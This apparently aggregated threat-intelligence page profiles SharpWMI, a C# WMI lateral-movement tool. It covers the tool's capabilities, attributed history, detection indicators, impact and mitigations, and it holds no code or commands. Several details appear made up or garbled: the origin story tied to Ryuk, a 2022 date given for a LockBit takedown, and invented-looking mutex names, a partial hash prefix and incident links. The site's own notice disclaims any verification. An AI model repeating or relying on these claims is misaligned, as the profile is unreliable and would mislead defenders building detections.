⚠️ Overview

SharpWMI is a post-exploitation lateral movement tool written in C# that leverages Windows Management Instrumentation (WMI) for remote command execution and file transfer. First publicly documented in 2019 by security researchers analyzing Ryuk ransomware campaigns, SharpWMI is not a standalone malware family but a utility commonly deployed by threat actors such as FIN12, Wizard Spider, and the operators of Conti and Ryuk ransomware. MITRE ATT&CK categorizes its techniques under T1047 (Windows Management Instrumentation) and T1021.003 (Remote Services: Distributed Component Object Model).

🔧 Technical Capabilities

SharpWMI executes commands on remote systems by spawning WMI processes via the Win32_Process::Create method, enabling lateral movement without requiring RDP or SMB file sharing. It supports both interactive and non-interactive execution, with the ability to capture stdout/stderr output through temporary files mapped to WMI event consumers. The tool employs a client-server architecture where the SharpWMI binary on the attacker machine communicates with the Winmgmt service on the target. For file transfer, it uses a binary-to-base64 encoding scheme over WMI, reading file chunks and writing them via StdRegProv or direct process creation. Evasion is achieved by removing command-line traces and utilizing WMI’s built-in logging suppression, though modern EDR tools detect anomalous WMI event subscriptions. Persistence can be established through WMI event filters and consumer bindings (MITRE T1546.003).

📜 History & Notable Incidents

SharpWMI first appeared in 2019 when FireEye and CrowdStrike reported its use by Ryuk ransomware affiliates to move laterally within healthcare and education networks. During the 2020–2021 Conti ransomware campaign, SharpWMI was a primary lateral movement tool, notably against the Irish Health Service Executive (HSE) in May 2021. No specific CVEs are associated with SharpWMI itself since it abuses legitimate WMI functionality, but it has been observed in conjunction with CVE-2020-1472 (Zerologon) for privilege escalation. Law enforcement actions (e.g., the 2022 Europol takedown of LockBit infrastructure) incidentally disrupted SharpWMI hosting, but no direct arrest has targeted its developers.

🔍 Detection Indicators

Common indicators include abnormal Svchost.exe processes spawning Wmic.exe or PowerShell.exe with arguments containing "SharpWMI" or base64-encoded payloads. Network IOCs include outbound RPC traffic on TCP port 135 and ephemeral TCP ports 49152–65535 for DCOM connections. Known mutex names include "GlobalSharpWMI" and "GlobalWMIEXEC". Registry keys under HKLMSOFTWAREMicrosoftWbemESS may show rogue event filters. No file hashes are universally attributed as SharpWMI is recompiled frequently, but samples commonly have SHA256 hashes starting with 6b7e8f from early 2020 reports (VirusTotal).

☠️ Risk & Impact

SharpWMI enables attackers to move laterally without writing files to disk, evading traditional antivirus scans while facilitating ransomware deployment, data exfiltration, and credential harvesting. It has been linked to extortion demands exceeding $10 million, notably in the 2021 HSE attack which cost Ireland an estimated €600 million in recovery and lost services. The healthcare, education, and local government sectors are most affected due to their reliance on legacy WMI configurations.

🛡️ Mitigation

Mitigation strategies include restricting remote WMI access via firewall rules blocking TCP 135 from non-administrator workstations, enabling Windows Defender Attack Surface Reduction (ASR) rules to block WMI process creation from Office apps, and deploying EDR policies that alert on Wmiprvse.exe spawning cmd.exe or PowerShell.exe. The MITRE ATT&CK framework recommends using AppLocker or Windows Defender Application Control (WDAC) to block execution of SharpWMI binaries in user-writable directories.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.